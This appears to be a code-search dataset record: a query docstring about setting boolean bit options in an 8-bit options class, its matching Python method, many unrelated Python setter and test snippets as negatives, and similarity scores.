"async def _hardcore_setheist(self, ctx):\r\n guild = ctx.guild\r\n config = await self.thief.get_guild_settings(guild)\r\n\r\n if config[\"Hardcore\"]:\r\n config[\"Hardcore\"] = False\r\n msg = \"Hardcore mode now OFF.\"\r\n else:\r\n config[\"Hardcore\"] = True\r\n msg = \"Hardcore mode now ON! **Warning** death will result in credit **and chip wipe**.\"\r\n await self.thief.config.guild(guild).Config.set(config)\r\n await ctx.send(msg)",
"def test_set_value_invalid(self):\r\n name = 'option1'\r\n option = self.config.options[name]\r\n value = 'invalid'\r\n initial_value = self.config.values[name]\r\n\r\n self.assertRaises(InvalidOptionValueError, self.config.set_value, name, option, value)\r\n self.assertEqual(self.config.values[name], initial_value)",
"def set_value(self, value):\n self.value = value",
"def set_value(self, value):\n self.value = value",
"def set_value(self, value):\n self.value = value",
"def __setitem__(self, key, value):\n\n if key not in self.options:\n raise KeyError(\"Invalid option '%s'.\" % key)\n elif 'enums' in self._moptions[key] and value not in self._moptions[key]['enums']:\n raise ValueError(\"Value ('%s') is not one of %s\" % (value, repr(self._moptions[key]['enums'])))\n elif self._moptions[key]['type'] == 'bool' and not isinstance(value, bool):\n raise TypeError(\"Value must be a boolean not '%s'\" % type(value).__name__)\n elif self._moptions[key]['type'] in ['integer', 'float'] and not isinstance(value, Number):\n raise TypeError(\"Value must be an integer not '%s'\" % type(value).__name__)\n self._runopts[key] = value",
"def set_contrast(self, value):\n assert 0x80 <= value <= 0xff, \"contrast value must be between 0x80 and 0xff\"\n self.command([0x21, self.TEMP_COEFF_2, self.BIAS_1_7, value, 0x20, self.DISPLAY_NORMAL])\n # 0x21 - enter extended instruction set (H=1)\n # 0x06 - set temperature coefficient 2\n # 0x14 - set BIAS system to n=3 (recomm. mux rate 1:40/1:34)\n # value - (80-ff) - set Vop (80 = 3.00V, ff = 10.68V), 8b seems to work (0x3b/d70: 3.00+(70*0.06)=7.2V)\n # 0x20 - back to basic instruction set\n # 0x0c - normal display mode",
"def __setitem__(self, key, value):\n raise KeyError(\"Not able to set '%s' enum directly in the '%s' bit field!\"\n \" Try to use add_enums() method.\" % (key, self.name))",
"def set_vector_value(self, which_vector, task_num, value):\n # unused helper function\n if which_vector == 'alive':\n self.is_task_alive[0][task_num] = value\n if which_vector == 'enabled_temporal':\n self.is_task_enabled[0][task_num] = value\n if which_vector == 'finished':\n self.is_task_finished[0][task_num] = value\n if which_vector == 'enabled_travel':\n self.travel_time_constraint_satisfied[0][task_num] = value",
"def __init__(__self__, *,\n crashed: bool,\n device_out_of_memory: bool,\n failed_roboscript: bool,\n not_installed: bool,\n other_native_crash: bool,\n timed_out: bool,\n unable_to_crawl: bool):\n pulumi.set(__self__, \"crashed\", crashed)\n pulumi.set(__self__, \"device_out_of_memory\", device_out_of_memory)\n pulumi.set(__self__, \"failed_roboscript\", failed_roboscript)\n pulumi.set(__self__, \"not_installed\", not_installed)\n pulumi.set(__self__, \"other_native_crash\", other_native_crash)\n pulumi.set(__self__, \"timed_out\", timed_out)\n pulumi.set(__self__, \"unable_to_crawl\", unable_to_crawl)",
"def set_test_afc_val(self):\r\r\n\r\r\n MAX_NUM_AGC_ITER = 10\r\r\n MAX_CHANGE = 2000\r\r\n afc_per_hz = 0.28 #Reasonable starting factor\r\r\n\r\r\n func_name = sys._getframe(0).f_code.co_name\r\r\n loggerDisplay = logging.getLogger(__name__ + func_name)\r\r\n afc_val = self.modemObj.get_afc_val()\r\r\n assert(afc_val is not None)\r\r\n afc_val = int(afc_val)\r\r\n loggerDisplay.info('Current afc value is %s' %afc_val)\r\r\n freq_err_Hz, freq_err_lim_str = self.get_freq_err_info_tuple()\r\r\n\r\r\n iteration = 0\r\r\n while freq_err_lim_str.upper() != \"OK\" and iteration < MAX_NUM_AGC_ITER:\r\r\n if freq_err_lim_str.upper() not in ['ULEL', 'NMAU', 'ULEU', 'NMAL']:\r\r\n loggerDisplay.info('Unexpected response; %s' %freq_err_lim_str.upper())\r\r\n loggerDisplay.info('Will continue with current afc value')\r\r\n break\r\r\n\r\r\n afc_change = int(freq_err_Hz * afc_per_hz)\r\r\n afc_change = min(afc_change, MAX_CHANGE)\r\r\n afc_change = max(afc_change, -MAX_CHANGE)\r\r\n afc_val += afc_change\r\r\n\r\r\n self.modemObj.set_afc_val(afc_val)\r\r\n loggerDisplay.info('Iteration %s' %(iteration+1))\r\r\n loggerDisplay.info(\"freq_err_Hz=%s, %s will try with new AFC value %s change %s\"\r\r\n %(freq_err_Hz, self.evm.dictKeysValidLim[freq_err_lim_str], afc_val, afc_change))\r\r\n old_freq_err_Hz = freq_err_Hz\r\r\n freq_err_Hz, freq_err_lim_str = self.get_freq_err_info_tuple()\r\r\n try:\r\r\n afc_per_hz = afc_change/(old_freq_err_Hz-freq_err_Hz)\r\r\n except ZeroDivisionError:\r\r\n afc_per_hz = 0.2\r\r\n if afc_per_hz < 0:\r\r\n afc_per_hz = 0.2 #It got worse, go back to something safe\r\r\n if afc_per_hz > 1:\r\r\n afc_per_hz = 1\r\r\n loggerDisplay.debug(\"afc_per_hz=%s\" %(afc_per_hz))\r\r\n iteration += 1\r\r\n\r\r\n if iteration < MAX_NUM_AGC_ITER:\r\r\n loggerDisplay.info(\"Carrier Frequency Error %s is within the required tolerance, Converged AFC value is %s after %s iterations\"\r\r\n %(freq_err_Hz, afc_val, iteration))\r\r\n else:\r\r\n loggerDisplay.info(\"Carrier Frequency Error %s is outside the required tolerance after %s iterations\"\r\r\n %(freq_err_Hz, iteration))\r\r\n loggerDisplay.info(\"Will use AFC value %s\" %afc_val)\r\r\n raise ExGeneral(\"Fail: AFC correction did not converge to a frequency error within tolerance.\")",
"def state(self, value, duration=None):\n if value in ['off', 'OFF', '0']:\n self.off()\n if value in ['on', 'ON', '1']:\n self.on(duration)",
"def setValue(self,val):\n if val:\n self.input.setValue(val)",
"async def _opt_set(self, ctx, option, value):\n try:\n guild_options = self.database.get_guild_options(ctx.guild.id)\n cur_val = getattr(guild_options, option)\n if isinstance(cur_val, (int, bool)):\n if value.upper() == \"ALLOW\" or value.upper() == \"TRUE\":\n value = True\n elif value.upper() == \"FORBID\" or value.upper() == \"FALSE\":\n value = False\n else:\n await ctx.send(\"Sorry, that option only accepts true or false values.\")\n return\n if isinstance(cur_val, str):\n value = utils.replace_escapes(value)\n setattr(guild_options, option, value)\n self.database.save_item(guild_options)\n await ctx.send(f\"Option {option} set to `{value}`\")\n except AttributeError:\n await ctx.send(\"I don't recognize that option.\")",
"def set_State(self, value):\n super(AddressValidationInputSet, self)._set_input('State', value)",
"def check_value(self, value):\n value = super().check_value(value)\n if value == self.states_enum.OUT and self.interlocked:\n raise InterlockError('Valve is currently forced closed')\n return value",
"def mark_error(self):\r\n self.status = ERROR",
"def _check_vals(self):\n\n try:\n self.is_set = True\n self.pack()\n except Exception as err:\n # Set default values again\n raise ValueError(\"Invalid arguments. Could not packed since: {}\".format(err))\n self.__init__()",
"def test_setFlags(self):\n self._flagsTest('setFlags', b'FLAGS')",
"def set_value(self, key, value=None,\n options=None, option_index=None, hidden=None):\n if key not in self:\n self.set_param(key, value,\n options=options,\n option_index=option_index)\n if options is not None:\n self[key]['options'] = options\n if value is None and option_index is None:\n option_index = self[key]['option_index']\n if option_index is not None:\n value = self[key]['options'][option_index]\n self[key]['option_index'] = option_index\n elif value is not None and self[key]['options'] is not None:\n try:\n option_index = self[key]['options'].index(value)\n self[key]['option_index'] = option_index\n except ValueError:\n pass\n elif self[key]['dtype'] == 'bool':\n if str(value).lower().strip() in FALSY:\n value = False\n else:\n value = True\n self[key]['value'] = value\n if hidden is not None:\n self[key]['hidden'] = hidden",
"async def set_init(self, value: int | float) -> bool:\n return await self.set_value(value, True)",
"def _setindicator(self, index: int, value: bool) -> None:\n bitmask = 1 << (index + 1)\n current = self._get_buffer(0x04)\n if value:\n self._set_buffer(0x04, current | bitmask)\n else:\n self._set_buffer(0x04, current & ~bitmask)\n if self._auto_write:\n self.show()",
"def reset_myself(self):\n print >>sys.stderr, 'UNEXPECTED VALUE'\n self.status = Modem.Status.IDLE\n self.error_status = Modem.ErrorDict.NONE",
"def setHack(self, pin, value, board=0):\n msg = [int(pin), int(value)]\n return self.callModule('hackp', board, 0, 'write', msg)",
"def set_value(self,parameter_number,value):\n code = int(\"01100000\",2) | parameter_number\n command = pack('<BH',code,int(rint(value)))\n reply = self.query(command = command,ser = self.ser, count=1)\n if len(reply) != 1:\n warn(\"expecting 1, got %d bytes\" % len(reply)); return\n reply_code, = unpack('B',reply)\n if reply_code != code: warn(\"expecting 0x%X, got 0x%X\" % (code,reply_code))",
"def set_LED(name,light,value): #TODO UID convert to int\n name = _lookup(name)\n assert light in range(1,5), \"Error: light number must be an Integer between 1 and 4 inclusive\"\n assert value in range(4),\"Error: value must be an integer between 0 and 3 inclusive\"\n flag_data = list(name) + [-1,-1,-1,-1]\n flag_data[light] = value\n mc.set('flag_values',flag_data)",
"def set(self, attr, value=True):\n if type(value) == bool:\n self.__dict__['_'+attr] = value\n print attr, \"set to\", value\n else:\n print 'Value must be a bool, either \"True\" or \"False\" (no quotes)!'",
"def set_contrast(value):\n command([0x21, 0x14, value, 0x20, 0x0c])",
"def set(self):\n\n raise Exception(\"Can't set frmt.\")",
"def set_register(self, name, value):\n if name is 'P':\n value = value | (1 << 5)\n\n self.regs[name].set_value(value & 0xFF)\n return value & 0xFF",
"def test_bit_set_bit_invalid_arg_type(self):\n value = 85323.9\n ops = [bitwise_operations.bit_set(self.test_bin_zeroes, 0, 8, 1, value, None)]\n with pytest.raises(e.ParamError):\n self.as_connection.operate(self.test_key, ops)",
"def _setValveCharacteristic(self, f):\n if type(f) == types.InstanceType:\n self.setFunction(f)\n else:\n raise CanteraError(\"Wrong type for valve characteristic function.\")",
"def set_state( self ):",
"def value(self, value):\n\n\t\tself.__value = value",
"def set(self, boolean):\n self._val = boolean",
"def setExceptions(self, value):\n return self._set(exceptions=value)",
"def set_value(self, value):\n self.value = value\n return self",
"def _set_value(self, value):\n if value is undefined:\n self._status = 3 if (self._count == 0) else 0\n return # new tick, but no update of value\n self._last_value = self._value\n self._value = value\n self._count += 1\n self._last_timestamp = self._timestamp\n self._timestamp = time.time()\n self._status = 0\n if self._ob is not None:\n ob = self._ob()\n if hasattr(ob, '_signal_changed'):\n ob._signal_changed(self)",
"def __init__(self, value: str):\n self.options = [\n \"eddy_diffusion\",\n \"well_mixed\"\n ]",
"def _isfault(self):\n return self.dp.state()==PyTango.DevState.FAULT",
"def set_state(self, value):\n self.state = value",
"def setatt(self, value):\n if (value*4) % 1 :\n print ('RDCAT : WARNING {0} is not a multiple of 0.25 dB'.format(value))\n r=requests.get(self.url+'SETATT={0}\\n'.format(value))\n if r.text!='1':\n raise Exception('RDCAT : Error while setting attenuation.')",
"def set_dword(ea, value):\n if not ida_bytes.patch_dword(ea, value):\n raise RuntimeError(\"Unable to set value {} at {}\".format(ea, value))",
"def change_value_api(self, exe_name):\n exe = os.path.join(os.getcwd(), exe_name)\n\n # Create a target by the debugger.\n target = self.dbg.CreateTarget(exe)\n self.assertTrue(target, VALID_TARGET)\n\n # Create the breakpoint inside function 'main'.\n breakpoint = target.BreakpointCreateByLocation('main.c', self.line)\n self.assertTrue(breakpoint, VALID_BREAKPOINT)\n\n # Create the breakpoint inside the function 'main'\n check_breakpoint = target.BreakpointCreateByLocation('main.c', self.check_line)\n self.assertTrue(check_breakpoint, VALID_BREAKPOINT)\n\n # Create the breakpoint inside function 'main'.\n end_breakpoint = target.BreakpointCreateByLocation('main.c', self.end_line)\n self.assertTrue(end_breakpoint, VALID_BREAKPOINT)\n\n # Now launch the process, and do not stop at entry point.\n process = target.LaunchSimple(None, None, os.getcwd())\n self.assertTrue(process, PROCESS_IS_VALID)\n\n # Get Frame #0.\n self.assertTrue(process.GetState() == lldb.eStateStopped)\n thread = lldbutil.get_stopped_thread(process, lldb.eStopReasonBreakpoint)\n self.assertTrue(thread.IsValid(), \"There should be a thread stopped due to breakpoint condition\")\n frame0 = thread.GetFrameAtIndex(0)\n self.assertTrue (frame0.IsValid(), \"Got a valid frame.\")\n\n # Get the val variable and change it:\n error = lldb.SBError()\n\n val_value = frame0.FindVariable (\"val\")\n self.assertTrue (val_value.IsValid(), \"Got the SBValue for val\")\n actual_value = val_value.GetValueAsSigned (error, 0);\n self.assertTrue (error.Success(), \"Got a value from val\")\n self.assertTrue (actual_value == 100, \"Got the right value from val\")\n \n result = val_value.SetValueFromCString (\"12345\")\n self.assertTrue (result, \"Setting val returned True.\")\n actual_value = val_value.GetValueAsSigned (error, 0);\n self.assertTrue (error.Success(), \"Got a changed value from val\")\n self.assertTrue (actual_value == 12345, \"Got the right changed value from val\")\n \n # Now check that we can set a structure element:\n\n mine_value = frame0.FindVariable (\"mine\")\n self.assertTrue (mine_value.IsValid(), \"Got the SBValue for mine\")\n \n mine_second_value = mine_value.GetChildMemberWithName (\"second_val\")\n self.assertTrue (mine_second_value.IsValid(), \"Got second_val from mine\")\n actual_value = mine_second_value.GetValueAsUnsigned (error, 0)\n self.assertTrue (error.Success(), \"Got an unsigned value for second_val\")\n self.assertTrue (actual_value == 5555)\n\n result = mine_second_value.SetValueFromCString (\"98765\")\n self.assertTrue (result, \"Success setting mine.second_value.\")\n actual_value = mine_second_value.GetValueAsSigned (error, 0);\n self.assertTrue (error.Success(), \"Got a changed value from mine.second_val\")\n self.assertTrue (actual_value == 98765, \"Got the right changed value from mine.second_val\")\n \n # Next do the same thing with the pointer version.\n ptr_value = frame0.FindVariable (\"ptr\")\n self.assertTrue (ptr_value.IsValid(), \"Got the SBValue for ptr\")\n \n ptr_second_value = ptr_value.GetChildMemberWithName (\"second_val\")\n self.assertTrue (ptr_second_value.IsValid(), \"Got second_val from ptr\")\n actual_value = ptr_second_value.GetValueAsUnsigned (error, 0)\n self.assertTrue (error.Success(), \"Got an unsigned value for ptr->second_val\")\n self.assertTrue (actual_value == 6666)\n\n result = ptr_second_value.SetValueFromCString (\"98765\")\n self.assertTrue (result, \"Success setting ptr->second_value.\")\n actual_value = ptr_second_value.GetValueAsSigned (error, 0);\n 
self.assertTrue (error.Success(), \"Got a changed value from ptr->second_val\")\n self.assertTrue (actual_value == 98765, \"Got the right changed value from ptr->second_val\")\n \n # gcc may set multiple locations for breakpoint\n breakpoint.SetEnabled(False)\n\n # Now continue, grab the stdout and make sure we changed the real values as well...\n process.Continue();\n\n self.assertTrue(process.GetState() == lldb.eStateStopped)\n thread = lldbutil.get_stopped_thread(process, lldb.eStopReasonBreakpoint)\n self.assertTrue(thread.IsValid(), \"There should be a thread stopped due to breakpoint condition\")\n\n expected_value = \"Val - 12345 Mine - 55, 98765, 55555555. Ptr - 66, 98765, 66666666\"\n stdout = process.GetSTDOUT(1000)\n self.assertTrue (expected_value in stdout, \"STDOUT showed changed values.\")\n\n # Finally, change the stack pointer to 0, and we should not make it to our end breakpoint.\n frame0 = thread.GetFrameAtIndex(0)\n self.assertTrue (frame0.IsValid(), \"Second time: got a valid frame.\")\n sp_value = frame0.FindValue (\"sp\", lldb.eValueTypeRegister);\n self.assertTrue (sp_value.IsValid(), \"Got a stack pointer value\")\n result = sp_value.SetValueFromCString(\"1\")\n self.assertTrue (result, \"Setting sp returned true.\")\n actual_value = sp_value.GetValueAsUnsigned (error, 0)\n self.assertTrue (error.Success(), \"Got a changed value for sp\")\n self.assertTrue (actual_value == 1, \"Got the right changed value for sp.\")\n \n # Boundary condition test the SBValue.CreateValueFromExpression() API.\n # LLDB should not crash!\n nosuchval = mine_value.CreateValueFromExpression(None, None)\n\n process.Continue()\n\n self.assertTrue(process.GetState() == lldb.eStateStopped)\n thread = lldbutil.get_stopped_thread(process, lldb.eStopReasonBreakpoint)\n self.assertTrue(thread == None, \"We should not have managed to hit our second breakpoint with sp == 1\")\n \n process.Kill()",
"def set_error(self, name, value):\n self.errors[name] = value",
"def set_val(self, input):\n return",
"def setConstantValue(self, constant_value):\r\n\t\tself.ConstantValue = ConstantValue",
"def _set_power(self, value: str):\n if value == STATE_ON:\n self.state[1] = self.state[1][:2] + '1' + self.state[1][3:]\n\n if value == STATE_OFF:\n self.state[1] = self.state[1][:2] + '0' + self.state[1][3:]",
"def set_bomb(self):\n self.bomba = True",
"def setValue(self, value):\n self.setValues((value, value))",
"def command(self):\n saw_error = False\n try:\n analog_gain = float(self.value_analog.get())\n except:\n print(\"analog must be floating point value\")\n self.value_analog.set(str(self.tcp_comms.tcp_params.analog_gain_target))\n saw_error = True\n try:\n digital_gain = float(self.value_digital.get())\n except:\n print(\"digital must be floating point value\")\n self.value_digital.set(str(self.tcp_comms.tcp_params.digital_gain_target))\n saw_error = True\n try:\n analog_tol = float(self.value_analog_tol.get())\n except:\n print(\"analog tol must be floating point value\")\n self.value_analog_tol.set(str(self.tcp_comms.tcp_params.analog_gain_tol))\n saw_error = True\n try:\n digital_tol = float(self.value_digital_tol.get())\n except:\n print(\"digital tol must be floating point value\")\n self.value_digital_tol.set(str(self.tcp_comms.tcp_params.digital_gain_tol))\n saw_error = True\n if not saw_error:\n self.tcp_comms.tcp_params.analog_gain_target = analog_gain\n self.tcp_comms.tcp_params.digital_gain_target = digital_gain\n self.tcp_comms.tcp_params.analog_gain_tol = analog_tol\n self.tcp_comms.tcp_params.digital_gain_tol = digital_tol\n self.tcp_comms.send_freeze_exposure(analog_gain, analog_tol, digital_gain, digital_tol)"
] | [
"0.6006613",
"0.59550226",
"0.5876505",
"0.5848868",
"0.58279836",
"0.57625586",
"0.57241833",
"0.57025355",
"0.5644544",
"0.56344664",
"0.5631761",
"0.55913144",
"0.55671185",
"0.551112",
"0.5497896",
"0.5429743",
"0.54183626",
"0.53717023",
"0.5368946",
"0.53565514",
"0.5347902",
"0.53451985",
"0.5303583",
"0.529641",
"0.5279937",
"0.52314514",
"0.5228706",
"0.52227205",
"0.5221943",
"0.52100074",
"0.52006066",
"0.51646626",
"0.51585066",
"0.5135795",
"0.50984234",
"0.5097249",
"0.50876653",
"0.5077763",
"0.50727683",
"0.50532305",
"0.50528306",
"0.50527555",
"0.505041",
"0.504531",
"0.5045042",
"0.50133383",
"0.50133383",
"0.5010557",
"0.5010001",
"0.49986178",
"0.49870855",
"0.49844593",
"0.49844593",
"0.49844593",
"0.49809316",
"0.4980904",
"0.4961235",
"0.49609217",
"0.49458975",
"0.49400958",
"0.49400562",
"0.49398074",
"0.49378914",
"0.4934352",
"0.49112028",
"0.49104732",
"0.49007127",
"0.48794076",
"0.48685896",
"0.486616",
"0.48644373",
"0.48632887",
"0.48574615",
"0.48507324",
"0.48439005",
"0.48430458",
"0.4828401",
"0.48257303",
"0.48239243",
"0.48178342",
"0.48077777",
"0.48076195",
"0.48050842",
"0.48030123",
"0.4802926",
"0.48020336",
"0.47954947",
"0.4793415",
"0.47924808",
"0.47867045",
"0.47861558",
"0.47854972",
"0.47847798",
"0.47819123",
"0.47814485",
"0.47792783",
"0.47766557",
"0.47738823",
"0.47733542",
"0.4770173"
] | 0.7903865 | 0 |
Set the value (and call the base class). This will also check the Options to set the bools. BOOLEAN_CONFIG_1 bit layout: >>> BIT_PROBE_TERMINATION = 0 >>> BIT_TMODE = 1 >>> BIT_EMODE = 2 >>> BIT_MUTE = 3 >>> BIT_PATTERN_TRIGGER = 4 >>> BIT_DEBUG_REALTIME = 5 >>> BIT_DEBUGPRINT = 6 >>> BIT_DEBUG_HW_OVERRIDE = 7 | def set_value(self, item, value):
super(t_8_Bit_Options, self).set_value(item, value)
if(item == t_8_Bit_Options.BOOLEAN_CONFIG_1):
self.set_bools(value, self.bools, t_8_Bit_Options.BIT_MAX) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def setbool(self, strcommand, value):\n command = ct.c_wchar_p(strcommand)\n value = ct.c_bool(value)\n self.lib.AT_SetBool(self.AT_H, command, value)",
"def setBoolean(self, key, value):\n self.__config.setValue(key, QtCore.QVariant(value))\n self.__saved = False",
"def Set(self,value):\n if value:\n onoff = 0x01\n else:\n onoff = 0x00\n self.Bus.Write_uInt8(self.Address,0x20+self.Pin, onoff)",
"def setBoolValue(self, *args):\n return _libsbml.ConversionOption_setBoolValue(self, *args)",
"def setBooleanOption(self, option, value):\n result = self.__lib.voikkoSetBooleanOption(self.__handle, option, _boolToInt(value))\n if result == 0:\n raise VoikkoException(\"Could not set boolean option %s to value %s\" % (option, value))",
"def set_bool_value(self, event):\n\n self.undo_add()\n\n key_list = list(self.patch.engine.misc_data.keys())\n key = key_list[self.selected_index]\n data = self.patch.engine.misc_data[key]\n\n if self.ValueEnabled.GetValue():\n self.patch.misc[key] = data['on']\n else:\n self.patch.misc[key] = data['off']\n\n self.is_modified(True)\n self.misclist_update_row(self.selected_index)",
"def _setBoolFeature(self, valueToSet):\n\n errorCode = VimbaDLL.featureBoolSet(self._handle,\n self._name,\n valueToSet)\n if errorCode != 0:\n raise VimbaException(errorCode)",
"def setBoolValue(self, *args):\n return _libsbml.ConversionProperties_setBoolValue(self, *args)",
"def _writeBool(self, val):\n self.__writeValue(self.boolFormat, val)",
"def set_bools(self, value, bools, limit):\n for x in range(limit):\n if value & 1 << x:\n bools[x]['value'] = True\n else:\n bools[x]['value'] = False\n pass",
"def change_setting(self, key, val):\n if isinstance(val, bool):\n payload = 'on' if val else 'off'\n else:\n payload = val\n return self._request('post',\n 'fifo_command.php?cmd={}%20{}'.format(key,\n payload))",
"def set_value(self, item, value):\n super(t_16_Bit_Options, self).set_value(item, value)\n\n if(item == t_16_Bit_Options.FAULT_ACTIVE):\n self.set_bools(value, self.faults_current, t_16_Bit_Options.BIT_FAULT_MAX )\n\n if(item == t_16_Bit_Options.FAULT_LATCHED):\n self.set_bools(value, self.faults_latched, t_16_Bit_Options.BIT_FAULT_MAX )",
"def _set_bool(name, value, context):\n if name in os.environ:\n envval = os.environ.get(name).lower()\n if envval in [\"1\", \"true\", \"y\", \"yes\"]:\n context[name] = True\n elif envval in [\"0\", \"false\", \"n\", \"no\"]:\n context[name] = False\n else:\n raise ValueError(f\"{name} is a boolean, cannot match '{os.environ[name]}'\")\n\n _set_default(name, value, context)",
"def set_gateway(self, bool_value):\n self.chkbtn_gateway.set(bool_value)",
"def set(self, boolean):\n self._val = boolean",
"def set(self, attr, value=True):\n if type(value) == bool:\n self.__dict__['_'+attr] = value\n print attr, \"set to\", value\n else:\n print 'Value must be a bool, either \"True\" or \"False\" (no quotes)!'",
"def setBit(self,i,boolval):\n self.boolVals[i]=boolval",
"async def set_bit(self, instance, value):\n print(f\"Server: {'set_bit'} Got 'put' request from outside: new value is {value} and type {type(value)}\")\n if self.device is not None:\n self.device.set_bit_server(value)\n else:\n print('device is None')",
"def set_parameter(self, name, value = None):\n set_option = False\n for parameter in self.parameters:\n if name in parameter.names:\n if isinstance(parameter, _Switch):\n if value is None:\n import warnings\n warnings.warn(\"For a switch type argument like %s, \"\n \"we expect a boolean. None is treated \"\n \"as FALSE!\" % parameter.names[-1])\n parameter.is_set = bool(value)\n set_option = True\n else:\n if value is not None:\n self._check_value(value, name, parameter.checker_function)\n parameter.value = value\n parameter.is_set = True\n set_option = True\n if not set_option:\n raise ValueError(\"Option name %s was not found.\" % name)",
"def CONST_BOOL(self, t):\n t.value = False if t.value == '#false' else True\n return t",
"def set_flag(self, flag_name, value):\n flags = {'C':0, # Carry\n 'Z':1, # Zero\n 'I':2, # Interrupt mask\n 'D':3, # Decimal\n 'B':4, # Break\n 'V':6, # Overflow\n 'N':7} # Negative\n\n flag_reg = self.get_register('P')\n if value == 1:\n new_flag = flag_reg | 1 << flags[flag_name]\n else:\n new_flag = flag_reg & ~(1 << flags[flag_name])\n\n self.set_register('P', new_flag)",
"def writeBoolean(self, value: bool):\n self.writeByte(1 if value else 0)",
"def Set(self,value):\n self.Bus.Write_uInt8(self.Address,0x50+self.Pin,value)",
"def setFlag(self, flag, value) -> None:\n ...",
"def set_config_value(self, value, index=None):",
"def write(writer: BitStreamWriter, value: bool) -> None:\n\n writer.writeBool(value)",
"def test_set_boolean(self):\n setting_name = 'project_bool_setting'\n url = reverse(\n 'projectroles:api_project_setting_set',\n kwargs={'project': self.project.sodar_uuid},\n )\n post_data = {\n 'app_name': EX_APP_NAME,\n 'setting_name': setting_name,\n 'value': True,\n }\n response = self.request_knox(url, method='POST', data=post_data)\n self.assertEqual(response.status_code, 200, msg=response.content)\n obj = AppSetting.objects.get(name=setting_name, project=self.project)\n self.assertEqual(obj.get_value(), True)",
"def set_simple(value):\r\n LogOptions._SIMPLE = bool(value)",
"def device_set_property_bool(pnd, property, bEnable):\n return _nfc.device_set_property_bool(pnd, property, bEnable)",
"def test_set_type_bool(self):\n result = self.runner.invoke(\n cli,\n [\n *CLI_LOG_OPTION,\n \"config\",\n \"set\",\n \"agent.logging_config.disable_existing_loggers\",\n \"true\",\n \"--type=bool\",\n ],\n standalone_mode=False,\n catch_exceptions=False,\n )\n assert result.exit_code == 0",
"def __call__(self, parser, namespace, value, unused_option_string=None):\n try:\n setattr(namespace, self.dest, util.parse_bool(value))\n except TypeError as err:\n raise argparse.ArgumentError(self, 'Boolean value required') from err",
"def set_value(self, setting_id, value):\n if setting_id not in self.values:\n raise KeyError\n\n if self.types[setting_id] == \"bool\":\n self.values[setting_id] = (value.lower() == 'true')\n else:\n self.defaults[setting_id] = value\n return",
"def _setForBinding (self, value):\n if not isinstance(value, bool):\n raise TypeError(value)\n self.__forBinding = value\n return value",
"def setValue(self,val):\n if val:\n self.input.setCheckState(QtCore.Qt.Checked)\n else:\n self.input.setCheckState(QtCore.Qt.Unchecked)",
"def test_get_value_bool(self):\n val = self.setting_bool.get_value()\n self.assertIsInstance(val, bool)\n self.assertEqual(val, True)",
"def test_get_value_bool(self):\n val = self.setting_bool.get_value()\n self.assertIsInstance(val, bool)\n self.assertEqual(val, True)",
"def init_flag(self, value):\n if not isinstance(value, bool):\n raise TypeError(\"init_flag must be bool.\")\n self.set_init_flag(value)\n self._init_flag = value",
"def set_boolean(x):\n\n if x:\n return \"True\"\n else:\n return \"False\"",
"def val(self, new_val: bool) -> None:\n if type(new_val) != bool:\n raise TypeError(f\"Invalid literal {new_val} with type '{new_val.__class__.__name__}' for parameter 'new_val'\")\n self._val: bool = new_val\n return",
"def bool_on_off(value):\n return 'on' if value else 'off'",
"def SetAlwaysShowWiredInterface(self, value):\n config = ConfigParser.ConfigParser()\n config.read(self.app_conf)\n config.set(\"Settings\", \"always_show_wired_interface\", \n misc.to_bool(value))\n config.write(open(self.app_conf, \"w\"))\n self.always_show_wired_interface = misc.to_bool(value)",
"def set_opts(self, opts):\n opts = dict(opts)\n for k, v in opts.iteritems():\n try:\n # Fix for lofar parameter set integration:\n # If the attribute is a bool, test if it is a string.\n # and then try to parse it\n if hasattr(self, k):\n if isinstance(self.__getattribute__(k), bool):\n if isinstance(v, bool) or v == None:\n # just enter the bool into the parameter\n pass\n elif isinstance(v, basestring):\n # Try parse it as a parameter set bool string\n v = self._parse_string_as_bool(v)\n else:\n # raise error\n raise tcError(\"unknown type for bool variable\")\n if k == 'sb':\n # quick check on the sb sintax\n import re\n def sb_re(strg):\n return bool(re.match(\"^[0-9,.]*$\", strg))\n if not sb_re(v): raise RuntimeError('Parameter \"{0}\" is not defined properly.'.format(k))\n\n if v == \"none\":\n v = None\n self.__setattr__(k, v)\n except tcError, e:\n # Catch and re-raise as a RuntimeError\n raise RuntimeError('Parameter \"{0}\" is not defined properly.\\\n \\n {1}'.format(k, str(e)))",
"def virtual_flag(self, value):\n if not isinstance(value, bool):\n raise TypeError(\"virtual_flag must be bool.\")\n self._virtual_flag = value",
"async def bit(self, instance, value):\n print(f\"Server: {'bit'} Got 'put' request from outside: new value is {value} and type {type(value)}\")\n if self.device is not None:\n self.device.set_bit_client(value)\n else:\n print('device is None')",
"def set_switch_config(self, config_flags, miss_send_len):\n ofproto = self.datapath.ofproto\n parser = self.datapath.ofproto_parser\n self.logger.info(\"Setting config on switch \"\n \"dpid=%s to config_flags flag=%s and \"\n \"miss_send_len=%s bytes\",\n self.dpid, config_flags, miss_send_len)\n try:\n self.datapath.send_msg(parser.OFPSetConfig(\n self.datapath,\n config_flags,\n miss_send_len))\n except:\n #*** Log the error and return 0:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n self.logger.error(\"Failed to set switch config. \"\n \"Exception %s, %s, %s\",\n exc_type, exc_value, exc_traceback)\n return 0\n return 1",
"async def _opt_set(self, ctx, option, value):\n try:\n guild_options = self.database.get_guild_options(ctx.guild.id)\n cur_val = getattr(guild_options, option)\n if isinstance(cur_val, (int, bool)):\n if value.upper() == \"ALLOW\" or value.upper() == \"TRUE\":\n value = True\n elif value.upper() == \"FORBID\" or value.upper() == \"FALSE\":\n value = False\n else:\n await ctx.send(\"Sorry, that option only accepts true or false values.\")\n return\n if isinstance(cur_val, str):\n value = utils.replace_escapes(value)\n setattr(guild_options, option, value)\n self.database.save_item(guild_options)\n await ctx.send(f\"Option {option} set to `{value}`\")\n except AttributeError:\n await ctx.send(\"I don't recognize that option.\")",
"def rc_set_toggle(self,rc_field,value=None):\n\n rc_val = getattr(self.rc,rc_field)\n if value is None:\n value = not rc_val\n setattr(self.rc,rc_field,value)",
"def bool_config_override(key):\n if os.environ.get(key):\n try:\n truth_value = strtobool(os.environ[key])\n if truth_value == 1:\n config_opts[key] = True\n else:\n config_opts[key] = False\n except ValueError:\n values = [\"y\", \"yes\", \"t\", \"true\", \"on\", 1, \"n\", \"f\", \"false\", \"off\", 0]\n raise BuildTestError(f\"Must be one of the following {values}\")",
